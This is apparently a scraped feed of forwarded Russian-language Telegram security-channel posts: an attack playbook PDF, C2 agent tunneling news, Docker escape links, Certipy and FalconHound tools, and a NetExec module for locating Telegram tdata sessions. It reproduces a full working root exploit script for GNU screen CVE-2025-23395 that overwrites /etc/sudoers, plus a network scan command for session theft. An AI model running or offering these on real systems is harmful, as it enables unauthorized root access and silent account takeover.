Forwarded from Кибер ПТУ | Кибербезопасность
2025 attacks playbook.pdf
882.1 KB
Смотрим, как нас будут атаковать
Держите плейбук, а точнее сшитые вместе кучу плейбуков с векторами атак по абсолютно разным направлениям уибербеза и IT: от цепочек поставок и дипфейков до зеродеев и IoT-а.
В общем, сюда запихнули почти все известные вам ИБшные термины.
#BaseSecurity
🧠 Твой Пакет Знаний | 👨🏫 Менторство ИБ
📂 Другие каналы
Держите плейбук, а точнее сшитые вместе кучу плейбуков с векторами атак по абсолютно разным направлениям уибербеза и IT: от цепочек поставок и дипфейков до зеродеев и IoT-а.
В общем, сюда запихнули почти все известные вам ИБшные термины.
#BaseSecurity
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Adaptix Framework
С версии 0.5 агент gopher будет также работать и в Windows системах...
Еще в данном агенте появится socks5 прокси... А так как агент синхронный, то для каждого канала поднимаются свой поток и отдельное соединение с сервером C2. Туннель способен выдерживать даже многопоточные сканеры)
Еще в данном агенте появится socks5 прокси... А так как агент синхронный, то для каждого канала поднимаются свой поток и отдельное соединение с сервером C2. Туннель способен выдерживать даже многопоточные сканеры)
www.opennet.ru
Проект Tor представил Oniux, утилиту для сетевой изоляции приложений
Разработчики проекта Tor представили утилиту Oniux, предназначенную для принудительного направления трафика отдельных приложений через сеть Tor. По своему назначению Oniux напоминает ранее доступную программу torsocks и отличается использованием для изоляции…
🔗Ссылка:
https://opennet.ru/63237/
https://opennet.ru/63237/
Forwarded from AP Security
#soc
FalconHound
С момента своего выхода в 2016 году BloodHound стал основным инструментом для специалистов по наступательной безопасности, позволяющим выявлять неправильные конфигурации в Active Directory.
Основная цель FalconHound - обеспечить использование всех различных событий в системе и обновление базы данных BloodHound для улучшения качества работы синих команд при его использовании
FalconHound
С момента своего выхода в 2016 году BloodHound стал основным инструментом для специалистов по наступательной безопасности, позволяющим выявлять неправильные конфигурации в Active Directory.
Основная цель FalconHound - обеспечить использование всех различных событий в системе и обновление базы данных BloodHound для улучшения качества работы синих команд при его использовании
GitHub
GitHub - FalconForceTeam/FalconHound: FalconHound is a blue team multi-tool. It allows you to utilize and enhance the power of…
FalconHound is a blue team multi-tool. It allows you to utilize and enhance the power of BloodHound in a more automated fashion. It is designed to be used in conjunction with a SIEM or other log ag...
👍1
Forwarded from 1N73LL1G3NC3
CVE-2025-23395 Screen LPE exploit
Blog: https://security.opensuse.org/2025/05/12/screen-security-issues.html#3a-local-root-exploit-via-logfile_reopen-cve-2025-23395
#!/bin/sh
F=$(mktemp)
L=${HOME}/screen.log
T=/etc/sudoers
rm -rf $F $L
mkfifo $F
O=$(stat --printf="%s" $T)
echo "[+] spawning GNU screen"
screen -L -Logfile $L -dmS hax sh -c "cat $F"
while [ ! -f $L ]; do sleep 0.1; done
echo "[+] logfile appeared, doing hax"
rm $L
ln -s $T $L
P="${USER} ALL=(ALL) NOPASSWD:ALL"
(echo $P; for i in `seq 8192`; do echo; done) > $F
if [ $(stat --printf="%s" $T) -gt $O ] ; then
echo "[+] bl1ng bl1ng, we got it"
sudo sh
else
echo "[-] exploit failed :("
fi
rm -rf $F $L
Blog: https://security.opensuse.org/2025/05/12/screen-security-issues.html#3a-local-root-exploit-via-logfile_reopen-cve-2025-23395
👍1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Несколько часов назад была сильно обновлена утилита certipy. Обратим внимание, что в документации также появилось описание техники ESC16...
#redteam #pentest #ad #adcs
#redteam #pentest #ad #adcs
GitHub
GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse
Tool for Active Directory Certificate Services enumeration and abuse - ly4k/Certipy
Forwarded from Adaptix Framework
Forwarded from Похек
Kubernetes Pentesting
MicroK8s Pentesting
Docker Engine API Pentesting
Docker Escape
Docker Pentesting
Docker Registry Pentesting
Moby Docker Engine PrivEsc
Простой скрипт для проверки базовых векторов побега из Docker
https://github.com/eversinc33/JailWhale
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from s0ld13r ch. (s0ld13r)
Just make some Telegram enumeration ❤️
Наверняка многие уже слышали про папку tdata, которую Telegram Desktop создает локально на устройстве пользователя. Но далеко не все понимают, какую ценность она представляет для атакующего❗️
Если вы получаете доступ к tdata, вы фактически получаете незаметный доступ к Telegram-аккаунту пользователя. Такая сессия не отображается в списке активных сессий Telegram, и владелец аккаунта даже не узнает о компрометации. Для ред тимеров это отличный вектор для реализации техники T1552.008 Unsecured Credentials: Chat Messages😏
Для автоматизации энумерации устройств с Telegram Desktop я написал легковесный модуль для NetExec (форк CrackMapExec). Модуль сканирует Windows-шары по сети и ищет следы установленного Telegram✈️
5️⃣ GitHub repo: https://github.com/s0ld13rr/nxc_modules
👩💻 Usage:
P.S Автор не несет ответственности за неправомерное использование инструмента. Используйте осознанно и только в согласованных Red Team проектах🚨
🧢 s0ld13r
Наверняка многие уже слышали про папку tdata, которую Telegram Desktop создает локально на устройстве пользователя. Но далеко не все понимают, какую ценность она представляет для атакующего
Если вы получаете доступ к tdata, вы фактически получаете незаметный доступ к Telegram-аккаунту пользователя. Такая сессия не отображается в списке активных сессий Telegram, и владелец аккаунта даже не узнает о компрометации. Для ред тимеров это отличный вектор для реализации техники T1552.008 Unsecured Credentials: Chat Messages
Для автоматизации энумерации устройств с Telegram Desktop я написал легковесный модуль для NetExec (форк CrackMapExec). Модуль сканирует Windows-шары по сети и ищет следы установленного Telegram
nxc smb 10.0.0.0/8 -u 'user' -p 'password' -M telegram
P.S Автор не несет ответственности за неправомерное использование инструмента. Используйте осознанно и только в согласованных Red Team проектах
Please open Telegram to view this post
VIEW IN TELEGRAM
😎1